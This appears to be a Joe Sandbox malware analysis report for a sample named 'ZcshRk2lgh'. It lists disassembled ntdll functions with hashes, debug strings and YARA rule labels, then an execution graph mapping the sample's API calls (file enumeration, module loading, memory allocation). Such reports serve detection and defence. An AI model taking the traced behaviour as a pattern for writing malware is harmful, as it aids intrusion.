                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                  • Instruction ID: 772c848872814c2f5ba8f9a40c10f95ea8f65f848a970f181c83776beff93138
                                                                  • Opcode Fuzzy Hash: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                  • Instruction Fuzzy Hash: F2900221A0140602D50171584404616000AD7E1241F95C027A2024966ECB35CAA6A231
                                                                  Function 014E2EA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca9038d2f0a8073524d8e04d9b6eee38963b7568db3a92818957b75ef59e41e4
                                                                  • Instruction ID: 7b09d697012c2fa1e4cc60b8dcd9dd8eb8434c2ef6fea28c7c02918672051033
                                                                  • Opcode Fuzzy Hash: ca9038d2f0a8073524d8e04d9b6eee38963b7568db3a92818957b75ef59e41e4
                                                                  • Instruction Fuzzy Hash: B190027160140502D540715844047460005D7E1301F55C016A6064965EC769CEE96765
                                                                  Function 014E3010 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75c1d8d8bb9e1801dfc24634923e65043665655bc7cf63c2b0f54c9a937d6c50
                                                                  • Instruction ID: c5a0bc89570a4613a9b3d0c5b2e4759078490479a2f4e27d1250c43dd8d90037
                                                                  • Opcode Fuzzy Hash: 75c1d8d8bb9e1801dfc24634923e65043665655bc7cf63c2b0f54c9a937d6c50
                                                                  • Instruction Fuzzy Hash: 3990022160184542D54072584804B0F4105D7F2202F95C01EA5156965CCB25C9695721
                                                                  Function 014E3090 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b53fb3654903441cd80127d93a1b87ac834bdaaef1b3ea610a23ca3b4ccb47ee
                                                                  • Instruction ID: ae103a272fe30ebc52756fe9fe667b0e870381652a40948f7759acaffee8b32d
                                                                  • Opcode Fuzzy Hash: b53fb3654903441cd80127d93a1b87ac834bdaaef1b3ea610a23ca3b4ccb47ee
                                                                  • Instruction Fuzzy Hash: D590022164140902D540715884147070006D7E1601F55C016A1024965DC726CA7967B1
                                                                  Function 014E39B0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bf98920f3ca1c3e21c8ed84f84cfe01aca87da99c55834473f5d08146ec2ea4
                                                                  • Instruction ID: 3b2231d2b9db0d3f95e5eba7b0ebbdd31cdf3a785bf179f6e179d2bcf7be9abb
                                                                  • Opcode Fuzzy Hash: 9bf98920f3ca1c3e21c8ed84f84cfe01aca87da99c55834473f5d08146ec2ea4
                                                                  • Instruction Fuzzy Hash: 1190022164545202D550715C44046164005F7F1201F55C026A18149A5DC765C9696321
                                                                  Function 014E3D70 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a2edc3969f8205ab9839dc2dd277e21173e56d44a0da6bc838b3ab35d8433b2
                                                                  • Instruction ID: e1b8d78d63c00de8b9a5fbf706fb39d47b4bea4d6fb85a4298de75dc821639ce
                                                                  • Opcode Fuzzy Hash: 0a2edc3969f8205ab9839dc2dd277e21173e56d44a0da6bc838b3ab35d8433b2
                                                                  • Instruction Fuzzy Hash: 8A90023560140502D910715858046460046D7E1301F55D416A1424969DC764C9B5A221
                                                                  Function 014E3D10 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68273c2ae548c6a4d39857ff8507f6011519ddc609c2546be006533c0917f05d
                                                                  • Instruction ID: 05f5e9f80454f21ad2818676e47dad9d4cfc7110688435be2c601df093ad9460
                                                                  • Opcode Fuzzy Hash: 68273c2ae548c6a4d39857ff8507f6011519ddc609c2546be006533c0917f05d
                                                                  • Instruction Fuzzy Hash: A690023160240242994072585804A4E4105D7F2302B95D41AA1015965CCB24C9755321
                                                                  Function 014E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: 7d3e12b8ff83a606d8f201063d1aa649fa7a521a531f71ca39533797864ecef2
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 014E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
                                                                  • Instruction ID: 65350bc5e064fee78470c8fe52f7762850089f7ed1e7319cfd4e4cd026c3b8f6
                                                                  • Opcode Fuzzy Hash: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
                                                                  • Instruction Fuzzy Hash: B25105B6A04156AFDF12DFAD888497EFBFCBB48241710822AE455D7651D374DE0087A0
                                                                  Function 01552410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
                                                                  • Instruction ID: f6c19c6646765534b7b9bc489b8f7084d7973a33c04ba11d7b532057f672f367
                                                                  • Opcode Fuzzy Hash: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
                                                                  • Instruction Fuzzy Hash: 8651F875A00645EECF60DF6DC8A097EBBF9BB44204F14845FE996CF642E6B4DA008760
                                                                  Function 014D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01514787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015146FC
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514725
                                                                  • ExecuteOptions, xrefs: 015146A0
                                                                  • Execute=1, xrefs: 01514713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514655
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01514742
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                  • Instruction ID: 69acb1fb573d832c22a7e1b2950fedc08f14635ed6326e4a41206069db51aef6
                                                                  • Opcode Fuzzy Hash: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                  • Instruction Fuzzy Hash: 13518D3160021A7BEF11ABA9DC95FAE3BB8FF15715F14009FD509AB1E0E770AA028F50
                                                                  Function 014EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: 185cc0b20c9a1af70ed78c468672ac32ad711904e9339d4e8982afad44e71765
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: ED81CE70E452498EEF298E6CC8987BEBBF1FF45322F18421BD891A77A1C6308841CB51
                                                                  Function 015520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                  • Instruction ID: 79a37053504dcc2424de8fc6e7027256f65268358f85fb9740c393dedbc7230f
                                                                  • Opcode Fuzzy Hash: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                  • Instruction Fuzzy Hash: 7521517AA00119ABDB50DF79DC54ABFBBE9BF54640F08011BEE05E7201E730D9018BA1
                                                                  Function 014CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015102E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015102BD
                                                                  • RTL: Re-Waiting, xrefs: 0151031E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                  • Instruction ID: 9988d918bb88c0f1b4e6c068da3a965469f0c07f9c924588406eca8851a09e09
                                                                  • Opcode Fuzzy Hash: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                  • Instruction Fuzzy Hash: 8EE1DF346047429FE726CF28C884B6ABBE1BB84714F140A1EF5A5CB2E1D778D949CB52
                                                                  Function 014DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 01517B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01517B7F
                                                                  • RTL: Re-Waiting, xrefs: 01517BAC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                  • Instruction ID: d670ca06054816089e9745c883c4e6d394136375150abc233b7c008f2cc64c7b
                                                                  • Opcode Fuzzy Hash: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                  • Instruction Fuzzy Hash: 7841D3313007039BDB21DE29C860B6BB7E5FF9A720F110A1EE956DB3A0DB71E4058B91
                                                                  Function 014DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0151728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 015172A3
                                                                  • RTL: Re-Waiting, xrefs: 015172C1
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01517294
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                  • Instruction ID: d05e20719e132362d7bba95022bfd9a67dc3d36b0c10bd8a9025eafc645e91f6
                                                                  • Opcode Fuzzy Hash: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                  • Instruction Fuzzy Hash: 3741D631700603ABDB11DE29CC41FAAB7A5FB99714F11062EF9559B250DB31F85287D1
                                                                  Function 01552300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                  • Instruction ID: bfe616788acb240898782c7183326d6a27ef9872ad79a4c1f581c8ea3434b117
                                                                  • Opcode Fuzzy Hash: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                  • Instruction Fuzzy Hash: 77318472A00219DFDB60DF29CC50BEE77F8FB54610F45459BED49E7201EB30AA488BA0
                                                                  Function 014E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: e562c5645020a21c97786a464dec81ae18f9649b3cb806437db67194f44f9f9c
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: 54918E71E002169AEF24DF6DC898ABFBBE5AF44333F14461BE955A73E0E73089418791
                                                                  Function 014A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                  • Instruction ID: fea832b91ca3c4f940c301dcf20cd4802c4673de063770b359773e8268aaebfd
                                                                  • Opcode Fuzzy Hash: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                  • Instruction Fuzzy Hash: AD811D71D002699BDB35CF94CC44BEEB6B4BB58714F0545EAEA19BB290D7305E84CF60

                                                                  Execution Graph

                                                                  Execution Coverage:2.6%
                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:439
                                                                  Total number of Limit Nodes:70
                                                                  execution_graph 96856 92fad0 96857 92fb34 96856->96857 96858 9265f0 2 API calls 96857->96858 96860 92fc67 96858->96860 96859 92fc6e 96860->96859 96885 926700 96860->96885 96862 92fe13 96863 92fcea 96863->96862 96864 92fe22 96863->96864 96889 92f8b0 96863->96889 96865 9396e0 NtClose 96864->96865 96867 92fe2c 96865->96867 96868 92fd26 96868->96864 96869 92fd31 96868->96869 96898 93b860 96869->96898 96871 92fd5a 96872 92fd63 96871->96872 96873 92fd79 96871->96873 96874 9396e0 NtClose 96872->96874 96901 92f7a0 CoInitialize 96873->96901 96876 92fd6d 96874->96876 96877 92fd87 96904 9391b0 96877->96904 96879 92fe02 96880 9396e0 NtClose 96879->96880 96881 92fe0c 96880->96881 96882 93b780 RtlFreeHeap 96881->96882 96882->96862 96883 92fda5 96883->96879 96884 9391b0 LdrInitializeThunk 96883->96884 96884->96883 96886 926725 96885->96886 96908 939040 96886->96908 96890 92f8cc 96889->96890 96891 924880 2 API calls 96890->96891 96893 92f8ea 96891->96893 96892 92f8f3 96892->96868 96893->96892 96894 924880 2 API calls 96893->96894 96895 92f9be 96894->96895 96896 924880 2 API calls 96895->96896 96897 92fa18 96895->96897 96896->96897 96897->96868 96913 939a00 96898->96913 96900 93b87b 96900->96871 96903 92f805 96901->96903 96902 92f89b CoUninitialize 96902->96877 96903->96902 96905 9391ca 96904->96905 96916 34b2ba0 LdrInitializeThunk 96905->96916 96906 9391fa 96906->96883 96909 93905d 96908->96909 96912 34b2c60 LdrInitializeThunk 96909->96912 96910 926799 96910->96863 96912->96910 96914 939a1d 96913->96914 96915 939a2e RtlAllocateHeap 96914->96915 96915->96900 96916->96906 96917 92c8d0 96919 92c8f9 96917->96919 96918 92c9fd 96919->96918 96920 92c9a3 FindFirstFileW 96919->96920 96920->96918 96922 92c9be 96920->96922 96921 92c9e4 FindNextFileW 96921->96922 96923 92c9f6 FindClose 96921->96923 96922->96921 96923->96918 96924 92b050 96929 92ad60 96924->96929 96926 92b05d 96943 92a9e0 96926->96943 96928 92b073 96930 92ad85 96929->96930 96954 928690 96930->96954 96933 92aed0 96933->96926 96935 92aee7 96935->96926 96936 92aede 96936->96935 96938 92afd5 96936->96938 96973 92a430 96936->96973 96940 92b03a 96938->96940 96982 92a7a0 96938->96982 96941 93b780 RtlFreeHeap 96940->96941 96942 92b041 96941->96942 96942->96926 96944 92a9f3 96943->96944 96951 92a9fe 96943->96951 96945 93b860 RtlAllocateHeap 96944->96945 96945->96951 96946 92aa1f 96946->96928 96947 928690 GetFileAttributesW 96947->96951 96948 92ad32 96949 92ad48 96948->96949 96950 93b780 RtlFreeHeap 96948->96950 96949->96928 96950->96949 96951->96946 96951->96947 96951->96948 96952 92a430 RtlFreeHeap 96951->96952 96953 92a7a0 RtlFreeHeap 96951->96953 96952->96951 96953->96951 96955 9286b1 96954->96955 96956 9286b8 GetFileAttributesW 96955->96956 96957 9286c3 96955->96957 96956->96957 96957->96933 96958 9335a0 96957->96958 96959 9335ae 96958->96959 96960 9335b5 96958->96960 96959->96936 96961 924880 2 API calls 96960->96961 96962 9335ea 96961->96962 96963 9335f9 96962->96963 96986 933060 LdrLoadDll LdrLoadDll 96962->96986 96965 93b860 RtlAllocateHeap 96963->96965 96969 9337a4 96963->96969 96966 933612 96965->96966 96967 93379a 96966->96967 96966->96969 96970 93362e 96966->96970 96968 93b780 RtlFreeHeap 96967->96968 96967->96969 96968->96969 96969->96936 96970->96969 96971 93b780 RtlFreeHeap 96970->96971 96972 93378e 96971->96972 96972->96936 96974 92a456 96973->96974 96987 92de30 96974->96987 96976 92a4c8 96978 92a650 96976->96978 96980 92a4e6 96976->96980 96977 92a635 96977->96936 96978->96977 96979 92a2f0 RtlFreeHeap 96978->96979 96979->96978 96980->96977 96992 92a2f0 96980->96992 96983 92a7c6 96982->96983 96984 92de30 RtlFreeHeap 96983->96984 96985 92a84d 96984->96985 96985->96938 96986->96963 96989 92de54 96987->96989 96988 92de61 96988->96976 96989->96988 96990 93b780 RtlFreeHeap 96989->96990 96991 92dea4 96990->96991 96991->96976 96993 92a30d 96992->96993 96996 92dec0 96993->96996 96995 92a413 96995->96980 96997 92dee4 96996->96997 96998 92df8e 96997->96998 96999 93b780 RtlFreeHeap 96997->96999 96998->96995 96999->96998 97000 9225d0 97005 938d30 97000->97005 97004 92261b 97006 938d4d 97005->97006 97014 34b2c0a 97006->97014 97007 922606 97009 939780 97007->97009 97010 93980c 97009->97010 97011 9397ab 97009->97011 97017 34b2e80 LdrInitializeThunk 97010->97017 97011->97004 97012 93983d 97012->97004 97015 34b2c1f LdrInitializeThunk 97014->97015 97016 34b2c11 97014->97016 97015->97007 97016->97007 97017->97012 96770 930390 96771 9303ad 96770->96771 96774 924880 96771->96774 96773 9303cb 96776 9248a4 96774->96776 96775 9248ab 96775->96773 96776->96775 96777 9248ca 96776->96777 96781 93cc00 LdrLoadDll 96776->96781 96779 9248e0 LdrLoadDll 96777->96779 96780 9248f7 96777->96780 96779->96780 96780->96773 96781->96777 97018 9319d0 97019 9319ec 97018->97019 97020 931a14 97019->97020 97021 931a28 97019->97021 97022 9396e0 NtClose 97020->97022 97023 9396e0 NtClose 97021->97023 97024 931a1d 97022->97024 97025 931a31 97023->97025 97028 93b8a0 RtlAllocateHeap 97025->97028 97027 931a3c 97028->97027 97029 939550 97030 9395f4 97029->97030 97032 93957b 97029->97032 97031 93960a NtReadFile 97030->97031 97033 919e40 97036 91a1ac 97033->97036 97034 91a674 97036->97034 97037 93b3e0 97036->97037 97038 93b406 97037->97038 97043 914080 97038->97043 97040 93b412 97042 93b44b 97040->97042 97046 935830 97040->97046 97042->97034 97050 923530 97043->97050 97045 91408d 97045->97040 97047 935891 97046->97047 97049 93589e 97047->97049 97061 921d10 97047->97061 97049->97042 97051 92354a 97050->97051 97053 923563 97051->97053 97054 93a120 97051->97054 97053->97045 97056 93a13a 97054->97056 97055 93a169 97055->97053 97056->97055 97057 938d30 LdrInitializeThunk 97056->97057 97058 93a1c6 97057->97058 97059 93b780 RtlFreeHeap 97058->97059 97060 93a1df 97059->97060 97060->97053 97062 921d4b 97061->97062 97077 9281b0 97062->97077 97064 921d53 97065 93b860 RtlAllocateHeap 97064->97065 97075 922023 97064->97075 97066 921d69 97065->97066 97067 93b860 RtlAllocateHeap 97066->97067 97068 921d7a 97067->97068 97069 93b860 RtlAllocateHeap 97068->97069 97070 921d8b 97069->97070 97076 921e22 97070->97076 97092 926d50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97070->97092 97072 924880 2 API calls 97073 921fd2 97072->97073 97088 938170 97073->97088 97075->97049 97076->97072 97078 9281dc 97077->97078 97079 9280a0 2 API calls 97078->97079 97080 9281ff 97079->97080 97081 928221 97080->97081 97082 928209 97080->97082 97084 92823d 97081->97084 97086 9396e0 NtClose 97081->97086 97083 928214 97082->97083 97085 9396e0 NtClose 97082->97085 97083->97064 97084->97064 97085->97083 97087 928233 97086->97087 97087->97064 97089 9381d2 97088->97089 97091 9381df 97089->97091 97093 922040 97089->97093 97091->97075 97092->97076 97094 92204a 97093->97094 97110 928480 97094->97110 97096 922060 97103 9225b3 97096->97103 97114 9313a0 97096->97114 97099 922275 97122 93c950 97099->97122 97100 9220bb 97100->97103 97117 93c820 97100->97117 97103->97091 97104 92228a 97106 9222d7 97104->97106 97128 920b80 97104->97128 97106->97103 97107 920b80 LdrInitializeThunk 97106->97107 97131 928420 97106->97131 97107->97106 97108 928420 LdrInitializeThunk 97109 922425 97108->97109 97109->97106 97109->97108 97111 92848d 97110->97111 97112 9284b5 97111->97112 97113 9284ae SetErrorMode 97111->97113 97112->97096 97113->97112 97115 93b6f0 NtAllocateVirtualMemory 97114->97115 97116 9313c1 97115->97116 97116->97100 97118 93c830 97117->97118 97119 93c836 97117->97119 97118->97099 97120 93b860 RtlAllocateHeap 97119->97120 97121 93c85c 97120->97121 97121->97099 97123 93c8c0 97122->97123 97124 93b860 RtlAllocateHeap 97123->97124 97125 93c91d 97123->97125 97126 93c8fa 97124->97126 97125->97104 97127 93b780 RtlFreeHeap 97126->97127 97127->97125 97135 939970 97128->97135 97132 928433 97131->97132 97140 938c30 97132->97140 97134 92845e 97134->97106 97136 93998d 97135->97136 97139 34b2c70 LdrInitializeThunk 97136->97139 97137 920ba2 97137->97109 97139->97137 97141 938ca8 97140->97141 97142 938c58 97140->97142 97145 34b2dd0 